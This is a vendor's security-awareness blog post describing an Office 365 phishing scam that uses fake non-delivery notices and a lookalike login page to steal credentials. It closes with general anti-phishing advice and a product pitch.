Stay informed about cyber awareness training topics and mitigate risk in your organisation.

Scam of the Week: Sophisticated Phishing Scam Targets Office 365 Users

Phishing Scam Targets Office 365 Users

Office 365 users are the latest to be targeted with a convincing new phishing scam designed to steal their login credentials.

The scam was uncovered by security researcher Xavier Mertens as he collected data from his email ‘honeypots’. A honeypot is a computer system used to detect cyber-attacks and it provides valuable information on how cybercriminals operate.

The phishing email is disguised as a non-delivery notification from Office 365, informing the user that Microsoft has detected several undelivered messages on their account. It then prompts the recipient to click on the ‘send again’ link to resend the emails.

Image: Office 365 Phishing Email (Source: Internet Storm Center)

Office 365 phishing scam

As soon as the user clicks on the link, they’re directed straight through to a phishing website that impersonates the legitimate office 365 login page.  The site has been specifically set up to harvest user data and as can be seen from the below image, it’s extremely convincing and difficult to distinguish from the official Office 365 login page.

Image: Office 365 Phishing website (Source: Internet Storm Center)

Office 365 phishing scam

Once the victim enters their password, a JavaScript function called ‘sendmails’ relays the information back to the criminals and then redirects the user through to the legitimate Office 365 login URL.

The sophisticated nature of the scam highlights the extra care and vigilance users must take online. The URL should act as a red flag, but to the untrained eye the familiar branding and logos will be enough to trick them into disclosing sensitive information.

To prevent yourself from being phished by one of the many online phishing scams, there are a number of steps you should take:

  • Never click on links or download attachments from unknown sources.
  • Always verify the security of a website.
  • Pay close attention to the spelling of an email address, if there are any inconsistencies, delete immediately.
  • Ignore and delete emails with poor grammar, spelling or formatting.
  • Reputable companies will never ask you to supply personal information in an email.
  • Use unique passwords to reduce your chance of being hacked.
  • Install the latest anti-virus software on your device and ensure it is regularly updated.

Despite the increasing sophistication of phishing attacks there are a number of ways you can protect yourself online. MetaPhish has been specifically designed to protect businesses from phishing and ransomware attacks and provides the first line of defence in combating cyber-crime. Get in touch for further information on how we can help your business.

about the author

sharing is caring

Share on linkedin
Share on twitter
Share on facebook

you might enjoy reading these

Request Demo

The personal information that you provide to us in this form will only ever be used by MetaCompliance (as the Data Controller) for the following specifically defined purposes:

  • email you content that you have requested from us
  • with your consent, occasionally email you with targeted information regarding our service offerings
  • continually honour any opt-out request you submit in the future
  • comply with any of our legal and/or regulatory obligations